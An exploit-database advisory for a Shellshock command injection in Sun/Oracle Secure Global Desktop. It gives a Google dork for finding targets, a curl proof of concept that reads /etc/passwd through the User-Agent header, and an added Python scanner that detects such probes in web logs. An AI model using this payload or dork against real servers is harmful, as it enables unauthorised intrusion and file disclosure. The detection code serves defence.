Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)

Author: lastc0de
type: webapps
platform: cgi
port: 80
date_added: 2016-06-06  
date_updated: 2017-11-15  
verified: 0  
codes: CVE-2014-6278  

raw file: 39887.txt  
# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: lastc0de@outlook.com
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux

VULNERABLE FILE
http://target.com/tarantella/cgi-bin/modules.cgi

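POC:
localhost@~# curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt

localhost@~# cat xixixi.txt
This prints the contents of the /etc/passwd file. The CGI request exposes the User-Agent header to Bash as an environment variable, and a vulnerable Bash runs the commands that follow the function definition "() { :; };". The leading "echo;" emits the blank line that ends the CGI response headers, so the command output is returned as the response body and saved to xixixi.txt.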
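
A defender-side check for the request shown above, as an added example that is not part of the original advisory: it scans web server access logs for a Bash function definition in the request line, Referer or User-Agent and marks hits on the SGD CGI directory. It assumes the Apache "combined" log format; the function name and the sample log lines are constructed for illustration.

```python
import re

# Assumption: Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# Bash function-definition prefix "() {" with optional whitespace, as in the PoC header value.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')
CGI_PREFIX = "/tarantella/cgi-bin/"  # path taken from the advisory

def find_shellshock_probes(lines):
    """Return one finding per log line whose request, Referer or User-Agent
    carries a Bash function definition."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format: skip rather than guess
        fields = [f for f in ("request", "referer", "agent") if FUNC_DEF.search(m[f])]
        if not fields:
            continue
        parts = m["request"].split(" ")
        # Collapse repeated slashes so "//tarantella/..." is still recognised.
        path = re.sub(r"/+", "/", parts[1]) if len(parts) > 1 else ""
        findings.append({
            "line": lineno,
            "host": m["host"],
            "path": path,
            "status": int(m["status"]),
            "fields": fields,
            "sgd_cgi": path.startswith(CGI_PREFIX),
        })
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jun/2016:10:00:01 +0000] "GET /tarantella/cgi-bin/modules.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Jun/2016:10:00:05 +0000] "GET //tarantella/cgi-bin/modules.cgi HTTP/1.1" 200 1874 "-" "() { :; }; echo; /bin/cat /etc/passwd"',
    '203.0.113.4 - - [06/Jun/2016:10:02:11 +0000] "GET /index.html HTTP/1.1" 404 209 "() { :;}; echo" "curl/7.47.0"',
]

if __name__ == "__main__":
    for finding in find_shellshock_probes(SAMPLE_LOG):
        print(finding)
```

A match shows that the header pattern was sent, not that the host executed it; whether Bash on the server is patched has to be checked separately.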